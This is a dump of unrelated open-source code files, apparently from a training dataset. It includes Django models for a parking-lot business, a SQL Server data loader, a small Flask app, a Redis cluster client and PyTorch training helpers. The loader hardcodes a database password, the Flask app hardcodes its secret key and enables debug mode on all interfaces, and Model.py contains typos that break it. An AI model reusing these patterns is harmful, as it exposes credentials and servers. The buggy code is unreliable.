models.CharField(blank=True, null=True, max_length=200, verbose_name=\"住所2\")\n tel = models.CharField(blank=True, null=True, max_length=15, verbose_name=\"電話番号\",\n validators=(RegexValidator(regex=constants.REG_TEL),))\n fax = models.CharField(blank=True, null=True, max_length=15, verbose_name=\"ファックス\",\n validators=(RegexValidator(regex=constants.REG_TEL),))\n email = models.EmailField(blank=True, null=True, verbose_name=\"メール\")\n\n class Meta:\n db_table = 'ap_company'\n verbose_name = verbose_name_plural = \"自社情報\"\n\n def __str__(self):\n return self.name\n\n @classmethod\n def get_company(cls):\n \"\"\"自社情報を取得する。\n\n :return:\n \"\"\"\n return Company.objects.public_all().first()\n\n\nclass CarMaker(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"メーカー\")\n\n class Meta:\n db_table = 'mst_car_maker'\n ordering = ['name']\n verbose_name = \"メーカー\"\n verbose_name_plural = \"メーカー一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass CarModel(BaseModel):\n maker = models.ForeignKey(CarMaker, on_delete=models.PROTECT, verbose_name=\"メーカー\")\n name = models.CharField(max_length=100, verbose_name=\"車種\")\n grade_name = models.CharField(max_length=100, blank=True, null=True, verbose_name=\"グレード名\")\n sale_date = models.DateField(blank=True, null=True, verbose_name=\"発売年度\")\n length = models.IntegerField(blank=False, null=True, verbose_name=\"全長\")\n width = models.IntegerField(blank=False, null=True, verbose_name=\"全幅\")\n height = models.IntegerField(blank=False, null=True, verbose_name=\"全高\")\n weight = models.IntegerField(blank=False, null=True, verbose_name=\"重量\")\n f_value = models.IntegerField(blank=False, null=True, verbose_name=\"F値\")\n r_value = models.IntegerField(blank=False, null=True, verbose_name=\"R値\")\n min_height = models.IntegerField(blank=False, null=True, verbose_name=\"メーカーの地上最低高\")\n\n class Meta:\n db_table = 'mst_car_model'\n ordering = ['name']\n unique_together = ('maker', 'name', 'grade_name')\n verbose_name = \"車種\"\n verbose_name_plural = \"車種一覧\"\n\n def __str__(self):\n if self.grade_name:\n return '%s - %s ' % (self.name, self.grade_name)\n else:\n return self.name\n\n\nclass Bank(BaseModel):\n code = models.CharField(max_length=4, verbose_name=\"金融機関コード\")\n name = models.CharField(max_length=30, verbose_name=\"金融機関名称\")\n kana = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"金融機関カナ\")\n\n class Meta:\n db_table = 'mst_bank'\n ordering = ['code']\n verbose_name = \"金融機関\"\n verbose_name_plural = \"金融機関一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass BankAccount(BaseModel):\n bank = models.ForeignKey(Bank, verbose_name=\"銀行\")\n branch_no = models.CharField(max_length=7, verbose_name=\"支店番号\")\n branch_name = models.CharField(max_length=20, verbose_name=\"支店名称\")\n account_type = models.CharField(max_length=1, choices=constants.CHOICE_BANK_ACCOUNT_TYPE, verbose_name=\"預金種類\")\n account_number = models.CharField(max_length=7, verbose_name=\"口座番号\")\n account_holder = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"口座名義\")\n\n class Meta:\n db_table = 'mst_bank_account'\n ordering = ['bank', 'branch_no']\n unique_together = ('branch_no', 'account_number')\n verbose_name = \"銀行口座\"\n verbose_name_plural = \"銀行口座一覧\"\n\n def __str__(self):\n return self.branch_no\n\n\nclass TransmissionRoute(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"名称\")\n price_kbn = models.CharField(max_length=2, blank=True, null=True, verbose_name=\"金額区分\",\n choices=constants.CHOICE_PRICE_KBN)\n\n class Meta:\n db_table = 'mst_transmission_route'\n ordering = ['id']\n verbose_name = \"媒体\"\n verbose_name_plural = \"媒体一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass Mediation(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"業者名称\")\n\n class Meta:\n db_table = 'mst_mediation'\n ordering = ['name']\n verbose_name = \"仲介業者\"\n verbose_name_plural = \"仲介業者一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass Payment(BaseModel):\n name = models.CharField(max_length=30, unique=True, verbose_name=\"入金項目\")\n timing = models.CharField(max_length=2, choices=constants.CHOICE_PAY_TIMING, verbose_name=\"タイミング\")\n amount = models.IntegerField(blank=True, null=True, verbose_name=\"デフォールト金額\")\n consumption_tax_kbn = models.CharField(max_length=1, default=1, choices=constants.CHOICE_TAX_KBN,\n verbose_name=\"消費税\")\n is_initial = models.BooleanField(default=False, verbose_name=\"初期作成\")\n is_active = models.BooleanField(default=True, verbose_name=\"有効\")\n comment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"備考\")\n\n class Meta:\n db_table = 'mst_payment'\n ordering = ['timing', 'name']\n verbose_name = \"入金項目\"\n verbose_name_plural = \"入金項目一覧\"\n\n def __str__(self):\n return self.name\n\n def get_consumption_tax(self, amount=None):\n \"\"\"消費税を取得する。\n\n :param amount:\n :return:\n \"\"\"\n amount = amount if amount else self.amount\n if not amount:\n return 0\n if self.consumption_tax_kbn == '1':\n rate = Config.get_consumption_tax_rate()\n # 税抜の場合\n return common.get_consumption_tax(amount, rate, Config.get_decimal_type())\n else:\n return 0\n\n\nclass ReportFormat(BaseModel):\n path = models.FileField(upload_to=common.get_parking_lot_doc_path)\n kbn = models.CharField(max_length=3, choices=constants.CHOICE_REPORT_KBN, verbose_name=\"帳票区分\")\n comment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"備考\")\n order = models.SmallIntegerField(editable=False, verbose_name=\"並び順\")\n\n class Meta:\n db_table = 'mst_report_format'\n ordering = ['kbn']\n verbose_name = \"帳票フォーマット\"\n verbose_name_plural = \"帳票フォーマット一覧\"\n\n def __str__(self):\n return os.path.basename(str(self.path))\n\n\nclass MailTemplate(BaseModel):\n title = models.CharField(max_length=50, verbose_name=\"送信メールのタイトル\")\n body = models.TextField(verbose_name=\"メール本文\")\n password = models.TextField(blank=True, null=True, verbose_name=\"パスワードお知らせ本文\")\n comment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"説明\")\n\n class Meta:\n db_table = 'mst_mail_template'\n ordering = ['title']\n verbose_name = verbose_name_plural = \"メールテンプレート\"\n\n def __str__(self):\n return self.title\n\n\nclass MailGroup(BaseModel):\n code = models.CharField(max_length=3, primary_key=True, choices=constants.CHOICE_MAIL_GROUP, verbose_name=\"コード\")\n name = models.CharField(max_length=50, blank=False, null=True, verbose_name=\"名称\")\n sender = models.EmailField(verbose_name=\"メール差出人\")\n template = models.ForeignKey(MailTemplate, on_delete=models.CASCADE, verbose_name=\"メールテンプレート\")\n\n class Meta:\n db_table = 'mst_mail_group'\n ordering = ['code']\n verbose_name = verbose_name_plural = \"メールグループ\"\n\n def __str__(self):\n return self.name\n\n def get_cc_list(self):\n \"\"\"メール送信時のCC一覧を取得する。\n\n :return:\n \"\"\"\n return MailCcList.objects.public_filter(group=self, is_bcc=False)\n\n def get_bcc_list(self):\n \"\"\"メール送信時のBCC一覧を取得する。\n\n :return:\n \"\"\"\n return MailCcList.objects.public_filter(group=self, is_bcc=True)\n\n @classmethod\n def get_subscription_send_group(cls):\n \"\"\"ユーザー申込み時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='010')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_subscription_completed_group(cls):\n \"\"\"ユーザー申込み完了時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='011')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_inspection_send_group(cls):\n \"\"\"審査用フォーム送付時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='012')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_inspection_completed_group(cls):\n \"\"\"審査用フォーム完了時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='013')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_form_send_group(cls):\n \"\"\"ユーザー契約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='040')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_form_completed_group(cls):\n \"\"\"ユーザー契約完了時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='041')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_send_group(cls):\n \"\"\"ユーザー契約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='042')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_other_send_group(cls):\n \"\"\"ユーザー契約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='060')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_contract_cancellation_send_group(cls):\n \"\"\"ユーザー解約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='310')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_parking_lot_cancellation_send_group(cls):\n \"\"\"物件解約時のメール送信に関する情報を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='322')\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_batch_key_alert_group(cls):\n \"\"\"駐車場の予備鍵数が足り場合のメール送信設定を取得する。\n\n :return:\n \"\"\"\n try:\n return MailGroup.objects.get(code='800')\n except ObjectDoesNotExist:\n return None\n\n\n def get_template_content(self, context):\n \"\"\"メールテンプレートの内容を取得する。\n\n :param context:\n :return:\n \"\"\"\n t_title = Template(self.template.title)\n t_body = Template(self.template.body)\n t_password = Template(self.template.password) if self.template.password else None\n comment = self.template.comment or ''\n ctx = Context(context)\n return {\n 'title': t_title.render(ctx),\n 'body': t_body.render(ctx),\n 'password': t_password.render(ctx) if t_password else '',\n 'comment': comment,\n }\n\n def send_main(self, recipient_list, context, user=None):\n \"\"\"メール送信する\n\n :param context:\n :param user:\n :return:\n \"\"\"\n content = self.get_template_content(context)\n mail_data = {\n 'sender': self.sender,\n 'recipient_list': recipient_list,\n 'cc_list': [cc.email for cc in self.get_cc_list()],\n 'bcc_list': [bcc.email for bcc in self.get_bcc_list()],\n 'mail_title': content.get('title'),\n 'mail_body': content.get('body'),\n }\n\n mail = EbMail(**mail_data)\n mail.send_email(user)\n\n\nclass MailCcList(BaseModel):\n group = models.ForeignKey(MailGroup, on_delete=models.CASCADE, verbose_name=\"メールグループ\")\n email = models.EmailField(verbose_name=\"メールアドレス\")\n is_bcc = models.BooleanField(default=False, verbose_name=\"BCC\")\n\n class Meta:\n db_table = 'mst_mail_cc'\n ordering = ['group', 'email']\n verbose_name = verbose_name_plural = \"メールCCリスト\"\n\n def __str__(self):\n return self.email\n\n\nclass BatchManage(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"バッチID\")\n title = models.CharField(max_length=50, verbose_name=\"タイトル\")\n cron_tab = models.CharField(blank=True, null=True, max_length=100, verbose_name=\"実行タイミング\")\n is_active = models.BooleanField(default=True, verbose_name=\"有効フラグ\")\n comment = models.CharField(blank=True, null=True, max_length=255, verbose_name=\"説明\")\n\n class Meta:\n db_table = 'mst_batch_manage'\n verbose_name = \"バッチ管理\"\n verbose_name_plural = \"バッチ管理\"\n\n def __str__(self):\n return self.title\n\n def get_logger(self):\n \"\"\"バッチのロガーを取得する。\n\n :return:\n \"\"\"\n return common.get_batch_logger(self.name)\n\n @classmethod\n def get_log_entry_user(cls, username='batch'):\n \"\"\"ログエントリーにログを記録するにはログインユーザが必要\n\n :return:\n \"\"\"\n try:\n user = User.objects.get(username=username)\n return user\n except ObjectDoesNotExist:\n try:\n user = User.objects.get(username='admin')\n return user\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def get_batch_by_name(cls, name):\n \"\"\"指定した名前のバッチを取得する。\n\n :param name:\n :return:\n \"\"\"\n try:\n batch = BatchManage.objects.get(name=name)\n except ObjectDoesNotExist:\n batch = BatchManage(name=name)\n return batch\n\n\nclass PushNotification(BaseModel):\n user = models.ForeignKey(User, verbose_name=\"ユーザー\")\n registration_id = models.CharField(max_length=1000, verbose_name=\"デバイスの登録ID\")\n key_auth = models.CharField(max_length=100)\n key_p256dh = models.CharField(max_length=256)\n title = models.CharField(blank=True, null=True, max_length=100)\n message = models.CharField(blank=True, null=True, max_length=256)\n url = models.URLField(blank=True, null=True)\n\n class Meta:\n db_table = 'ap_push_notification'\n verbose_name = \"通知デバイス\"\n verbose_name_plural = \"通知デバイス一覧\"\n\n def __str__(self):\n return self.registration_id\n\n\nclass EMailLogEntry(models.Model):\n action_time = models.DateTimeField(_('action time'), default=timezone.now, editable=False)\n user = models.ForeignKey(User, on_delete=models.PROTECT, verbose_name=_('user'))\n sender = models.EmailField(verbose_name=\"差出人\")\n recipient = models.CharField(max_length=1000, verbose_name=\"宛先\")\n cc = models.CharField(max_length=1000, blank=True, null=True, verbose_name=\"CC\")\n bcc = models.CharField(max_length=1000, blank=True, null=True, verbose_name=\"BCC\")\n title = models.CharField(max_length=50, verbose_name=\"件名\")\n body = models.TextField(verbose_name=\"メール本文\")\n attachment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"添付ファイル名\")\n\n objects = models.Manager()\n\n class Meta:\n app_label = 'admin'\n managed = False\n db_table = 'ap_email_log'\n ordering = ['-action_time']\n verbose_name = verbose_name_plural = \"メール送信履歴\"\n","sub_path":"master/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":27585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"581496350","text":"import pymssql\r\nimport json\r\nimport sys\r\n\r\nlist1 = []\r\n\r\n\r\nclass json2sql:\r\n def me_json2sql(self, file_path):\r\n # 链接数据库\r\n conn = pymssql.connect('WIN-8D5O9I2ISMB', 'emily', '5258800a@', 'DBSource')\r\n cur = conn.cursor() # 创建游标对象,sql语句的执行基本都在游标上\r\n\r\n # 创建数据库表\r\n cur.execute(\"\"\"\r\n if not exists (select * from sysobjects a where a.name='IoStock')\r\n create table IoStock (\r\n count nchar(25),\r\n iostock_price_num nchar(25),\r\n unit_cost_num nchar(25),\r\n iostock_id nchar(255),\r\n iostock_bn nchar(255),\r\n branch_bn nchar(255),\r\n branch_name nchar(255),\r\n bn nchar(255),\r\n name nchar(255),\r\n barcode nchar(255),\r\n nums nchar(255),\r\n type nchar(255),\r\n iostock_time nchar(255),\r\n memo nchar(255),\r\n original_bn nchar(255),\r\n iostock_price nchar(255),\r\n unit_cost nchar(255),\r\n appropriation_no nchar(255)\r\n ) \"\"\") # 三引号的作用,将字符串原样复制\r\n\r\n # 打开json文件\r\n json_file = open(file_path, 'r', encoding='utf-8')\r\n tmp_file = json.load(json_file)[\"response\"] # 加载需要的字段\r\n print('tmp_file:', tmp_file)\r\n\r\n for j in tmp_file['lists']:\r\n sql_value = ( tmp_file[\"count\"],tmp_file[\"iostock_price_num\"],tmp_file[\"unit_cost_num\"],\r\n j[\"iostock_id\"], j[\"iostock_bn\"], j[\"branch_bn\"], j[\"branch_name\"],\r\n j[\"bn\"], j[\"name\"], j[\"barcode\"], j[\"nums\"], j[\"type\"], j[\"iostock_time\"],\r\n j[\"memo\"], j[\"original_bn\"], j[\"iostock_price\"], j[\"unit_cost\"], j[\"appropriation_no\"])\r\n list1.append(sql_value)\r\n print('list1', list1)\r\n try:\r\n cur.execute(\"\"\"truncate table IoStock\"\"\")\r\n sql = \"insert into IoStock values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\r\n cur.executemany(sql, list1)\r\n\r\n except:\r\n print('wrong')\r\n\r\n conn.commit()\r\n conn.close()\r\n # (count,iostock_price_num,unit_cost_num,iostock_id,iostock_bn,branch_bn,branch_name,bn,name,barcode,nums,type,iostock_time,memo,original_bn,iostock_price,unit_cost,appropriation_no)\r\n\r\n\r\nif __name__ == '__main__':\r\n s = json2sql()\r\n s.me_json2sql('C:/Users/Administrator/PycharmProjects/SHYLPro/Data2.json')\r\n","sub_path":"SHYL/IoStock.py","file_name":"IoStock.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"584740170","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\n@author: Shuai Yuan\n@date: 20/03/2015\n\"\"\"\n\nimport json\n\nfrom flask import Flask\n\nfrom request import get_random_bid_request, send_request\n\nSECRET_KEY = '\\\\\\xc1\\xbc\\x1a\\xbe\\n\\x87:T\\xbby+\\x9an\\xdc}\\xfe\\xf4\\xe2x('\n\napp = Flask(__name__)\n\n\n@app.route('/random_bid_request/')\ndef random_bid_request():\n req = get_random_bid_request()\n\n resp = send_request(req, 'http://localhost:8081/random_bid_response/')\n\n req = json.dumps(req, indent=4)\n resp = json.dumps(resp, indent=4)\n\n return req + '\\n' + resp\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8082, debug=True)\n\n","sub_path":"pyrequester/pyrequester/ssp.py","file_name":"ssp.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"586132533","text":"\"\"\"polliato URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/dev/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom tastypie.api import Api\n#from django.urls import path\nfrom api.resources import UserResource, CandidateResource, BallotResource, FeedResource, MessageResource\n\nv1_api = Api(api_name='v1')\nv1_api.register(UserResource())\nv1_api.register(CandidateResource())\nv1_api.register(BallotResource())\nv1_api.register(FeedResource())\nv1_api.register(MessageResource())\n\nurlpatterns = [\n url('admin/', admin.site.urls),\n url('api/', include(v1_api.urls))\n]\n\n\n","sub_path":"server/polliato/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"368871044","text":"# -*- coding=utf-8 -*-\n\nfrom models.models import User, News\n\n\nclass ModelTransferHelper(object):\n keys_relation = []\n obj = None\n\n def transfer_to_py(self, data):\n # model = dict(map(lambda x: (x[1], '' if data.get(x[0]) is None else data[x[0]]), self.keys_relation))\n for key in self.keys_relation:\n ts_attr = key[0]\n d = data.get(ts_attr)\n setattr(self.obj, key[1], d)\n\n return self.obj\n\n\nclass UserModelTransferHelper(ModelTransferHelper):\n\n def __init__(self):\n self.keys_relation = [('id', 'id'), ('userName', 'user_name'), ('pwd', 'pwd')]\n self.obj = User()\n\n\nclass NewsModelTransferHelper(ModelTransferHelper):\n\n def __init__(self):\n self.keys_relation = [('id', 'id'), ('title', 'title'), ('category', 'category'), ('categoryName', 'category_name'), \n ('summary', 'summary'), ('thumbnail', 'thumbnail'), ('author', 'author'), ('source', 'source'),\n ('publishDate', 'publish_date'), ('content', 'content')]\n self.obj = News()\n","sub_path":"api/helper/model_transfer_helper.py","file_name":"model_transfer_helper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"335176319","text":"import numpy as np\nfrom turtle import *\nimport random\n\n\ndef walking(colo):\n # Setting up the turtle\n setposition(0,0)\n shape(\"turtle\")\n color(colo)\n screensize(500, 500)\n speed(30)\n # Initiate the steps\n steps = 0\n\n while True:\n choice = np.random.randint(5, size = 1)\n if choice == 1:\n fd(10)\n steps += 1\n elif choice == 2:\n rt(90)\n fd(10)\n steps += 1\n elif choice == 3:\n left(90)\n fd(10)\n steps += 1\n else:\n backward(10)\n steps += 1\n\n done()\n\nif __name__ == \"__main__\":\n walking(\"mediumturquoise\")\n","sub_path":"Simulation/Single_Random_Walk.py","file_name":"Single_Random_Walk.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"355450824","text":"from typing import Callable, Dict, Iterable, List, Optional, Sequence, Union\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Optimizer\n\nfrom ignite.engine import Engine, _prepare_batch\nimport ignite.distributed as idist\n\n\nclass Model:\n def __init__(\n self,\n model: Union[nn.Module, Dict[str, nn.Module]],\n optimizer: Union[Optimizer, Dict[str, Opimizer]],\n loss_fn: Union[Optimizer, Dict[str, nn.Module]],\n device: Optional[torch.device] = None,\n ddp: bool = False,\n # amp_mode: str = False\n ):\n\n self.model = model\n self.optimizer = optimizer\n self.loss_fn = loss_fn\n self.device = device\n self.ddp = ddp\n # self.amp_mode = amp_mode\n\n # check model/optimizer/loss_fn here\n\n def _check_model(self):\n if (not isinstance(self.model, nn.Module)) or (not isinstance(self.model, dict)):\n raise TypeError(\"for single model: the model should be torch.nn.Module, \"\n \"and for multiple models: the models should \"\n \"be dict['model_name': torch.nn.Module], but got \"\n f\"{type(self.model).__name__}\")\n\n def _check_optimizer(self):\n if (not isinstance(self.optimizer, Optimizer)) or (not isinstance(self.optimizer, dict)):\n raise TypeError(\"for single optimizer: the optimizer should be torch.optim.Optimizer, \"\n \"and for multiple optimizers: the optimizers should \"\n \"be dict['optimizer_name': torch.optim.Optimizer], but got \"\n f\"{type(self.optimizer).__name__}\")\n\n def _check_loss_fn(self):\n if (not isinstance(self.loss_fn, nn.Module)) or (not isinstance(self.loss_fn, dict)):\n raise TypeError(\"for single loss_fn: the loss_fn should be torch.nn.Module, \"\n \"and for multiple moloss_fns: the loss_fns should \"\n \"be dict['loss_fn_name': torch.nn.nn.Module], but got \"\n f\"{type(self.loss_fn).__name__}\")\n\n def _check_device(self):\n if not isinstance(self.device, torch.device):\n raise TypeError(f\"device must be a torch.device, but found {type(self.device).__name__}\")\n\n def _check_data(self):\n if ((self.ddp) and (not isinstance(self.data, torh.utils.data.Dataset)) or \n (not isinstance(self.data, torch.utils.data.DataLoader)) and (not isinstance(self.data, dict))):\n raise TypeError(\"in this case the data must be a \"\n \"dict['data': torch.utils.data.Dataset, 'batch_size': int, 'num_workers': int, etc..]\")\n\n def _create_auto_training(self):\n if isinstance(self.model, dict):\n for key in self.model.keys():\n self.model[key] = idist.auto_model(self.model[key])\n for key in self.optimizer.keys():\n self.optimizer[key] = idist.auto_model(self.optimizer[key])\n for key in self.loss_fn.keys():\n self.loss_fn[key] = self.loss_fn[key].to(idist.device())\n else:\n self.model = idist.auto_model(self.model) \n self.optimizer = idist.auto_optim(self.optimizer)\n self.loss_fn = self.loss_fn.to(idist.device())\n\n def train_step(self, engine: Engine, batch: Sequence[torch.Tensor]):\n self.model.train()\n self.optimizer.zero_grad()\n X, y = _prepare_batch(batch)\n X = X.to(self.device)\n y = y.to(self.device)\n y_pred = self.model(X)\n loss = self.loss_fn(y_pred, y)\n loss.backward()\n optimizer.step()\n return {\"prediction\": y_pred, \"target\": y, \"loss\": loss.item()}\n\n def fit(\n self,\n data: Union[Iterator, Dict[str, Any]],\n num_epochs: Union[int, Dict[str, int]]\n ):\n self.data = data\n self._check_data()\n if self.ddp:\n def training(local_rank):\n self._create_auto_training()\n data = idist.auto_dataloader(**data)\n train_engine = Engine(self.train_step)\n train_engine.run(data, num_epochs)\n with idist.Parallel(backend='nccl') as parallel:\n parallel.run(training)\n else:\n self.model = self.model.to(self.device)\n self.loss_fn = self.loss_fn.to(self.device)\n train_engine = Engine(self.train_step)\n train_engine.run(data, num_epochs)\n\n def validate(self):\n pass\n\n def predict(self):\n pass\n\n\n# #########################################\n# ## Example 1 (Supervised Learning)\n# ## Single (model/optimizer/loss_fn)\n# #########################################\n# dataloader = DataLoader(...)\n# model = torch.nn.Module\n# optimizer = torch.optim.Optimizer\n# loss_fn = torch.nn.Module\n# model = Model(model, optimizer, loss_fn)\n# model.fit(dataloader, num_epochs=100)\n\n\n# #########################################\n# ## Example 2 (GANs)\n# ## Two (models, optimizers, loss_fns)\n# #########################################\n# dataloader = DataLoader(...)\n\n# model = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# optimizer = {'generator': torch.optim.Optimizer, 'discriminator': torch.optim.Optimizer}\n# loss_fn = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# num_epochs = {'generator': int, 'discriminator': int}\n\n# class CustomModel(Model):\n# def train_step(self, engine, batch):\n \"\"\"\n implement a train_step method\n for training gans\n \"\"\"\n # self.model[\"generator\"] = ...\n # self.optimizer[\"discriminator\"] = ...\n\n# model = CustomModel(model, optimizer, loss_fn)\n# model.fit(dataloader, num_epochs=num_epochs)\n\n\n# #########################################\n# ## Example 3 (DDP)\n# ## Single (model/optimizer/loss_fn)\n# #########################################\n# dataset = {'data': torch.utils.data.Dataset, 'batch_size': int, etc..}\n# model = torch.nn.Module\n# optimizer = torch.optim.Optimizer\n# loss_fn = torch.nn.Module\n# model = Model(model, optimizer, loss_fn, ddp=True)\n# model.fit(dataset, num_epochs=100)\n\n\n# #########################################\n# ## Example 4 (DDP) (GANs)\n# ## Two (models/optimizers/loss_fns)\n# #########################################\n# dataset = {'data': torch.utils.data.Dataset, 'batch_size': int, etc..}\n\n# model = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# optimizer = {'generator': torch.optim.Optimizer, 'discriminator': torch.optim.Optimizer}\n# loss_fn = {'generator': torch.nn.Module, 'discriminator': torch.nn.Module}\n# num_epochs = {'generator': int, 'discriminator': int}\n\n# class CustomModel(Model):\n# def train_step(self, engine, batch):\n \"\"\"\n implement a train_step method\n for training gans\n \"\"\"\n # self.model[\"generator\"] = ...\n # self.optimizer[\"discriminator\"] = ...\n\n# model = CustomModel(model, optimizer, loss_fn, ddp=True)\n# model.fit(dataset, num_epochs=num_epochs)","sub_path":"Approach4/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"599943197","text":"import asyncio\nfrom typing import List\n\nfrom rain.redis.client import Redis\nfrom rain.redis.others import crc16\n\n\n# noinspection PyMissingConstructor\nclass RedisCluster(Redis):\n\tdef __init__(self, *nodes: dict):\n\t\tself.nodes: List[Redis] = list(map(lambda x: Redis(**x), nodes))\n\t\tself.size = len(nodes)\n\n\t\tself._command_funcs = {}\n\n\tasync def _ainit(self):\n\t\tfor n in self.nodes:\n\t\t\tawait n._ainit()\n\n\tdef _command_wrapper(self, command):\n\t\tif command not in self._command_funcs:\n\t\t\tasync def execute(key, *args, **kwargs):\n\t\t\t\tclient = self.nodes[crc16(key.do_encode()) % self.size]\n\t\t\t\treturn await getattr(client, command)(key, *args, **kwargs)\n\n\t\t\texecute.__qualname__ = 'RedisCluster.{}'.format(command)\n\t\t\tself._command_funcs[command] = execute\n\n\t\treturn self._command_funcs[command]\n\n\tdef __getattribute__(self, item): # Redis client proxy\n\t\tif item in {\n\t\t\t'nodes', 'size', '_enter',\n\t\t\t'_command_wrapper', '_command_funcs',\n\t\t\t'_ainit', 'new'\n\t\t}:\n\t\t\treturn super().__getattribute__(item)\n\n\t\treturn self._command_wrapper(item)\n\n\t@classmethod\n\tasync def new(cls, *nodes: dict) -> 'RedisCluster':\n\t\tcluster = cls(*nodes)\n\t\tawait cluster._ainit()\n\n\t\treturn cluster\n\n\ndef create_redis_cluster(*redis_conf: dict, loop=None) -> RedisCluster:\n\tif not loop:\n\t\tloop = asyncio.get_event_loop()\n\treturn loop.run_until_complete(RedisCluster.new(*redis_conf))\n","sub_path":"rain/redis/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"648546540","text":"import sys\nfrom utils import extract_classifiers \nfrom eval.captioner import * \nfrom eval import eval_sentences\nfrom train_captions import transfer_weights\nimport argparse\nimport pdb \nfrom utils.config import *\n\ndef extract_features(args):\n extract_classifiers.extract_features(args.image_model, args.model_weights, args.imagenet_images, args.device, args.image_dim, args.lexical_feature, args.batch_size)\n\ndef transfer(args):\n \n transfer_net = transfer_weights.transfer_net(args.language_model, args.model_weights, args.orig_attributes, args.all_attributes, args.vocab)\n eval('transfer_net.' + args.transfer_type)(args.words, args.classifiers, args.closeness_metric, args.log, num_transfer=args.num_transfer, orig_net_weights=args.orig_model) \n\ndef generate_coco(args):\n #args.model_weights, args.image_model, args.language_model, args.vocab, args.image_list, args.precomputed_features\n\n model_weights = caption_weights_root + args.model_weights\n image_model = models_root + args.image_model\n language_model = models_root + args.language_model\n vocab = vocab_root + args.vocab\n if args.precomputed_features:\n precomputed_feats = feature_dir + args.precomputed_features\n else:\n precomputed_feats = args.precomputed_features\n\n image_list = open_txt(image_list_root + args.image_list)\n\n captioner = Captioner(model_weights, image_model, language_model, vocab, precomputed_feats=precomputed_feats,\n prev_word_restriction=True, image_feature=args.image_feature, language_feature=args.language_feature)\n gen_json = captioner.generate_sentences(coco_images_root, image_list, temp=float('inf'), dset='coco', tag='val_val_beam1_coco')\n gt_json = annotations + 'captions_%s2014.json' %args.split\n new_words = ['bus', 'bottle', 'couch', 'microwave', 'pizza', 'racket', 'suitcase', 'zebra']\n #new_words = ['suitcase', 'zebra']\n eval_sentences.add_new_word(gt_json, gen_json, new_words)\n\ndef generate_imagenet(args):\n 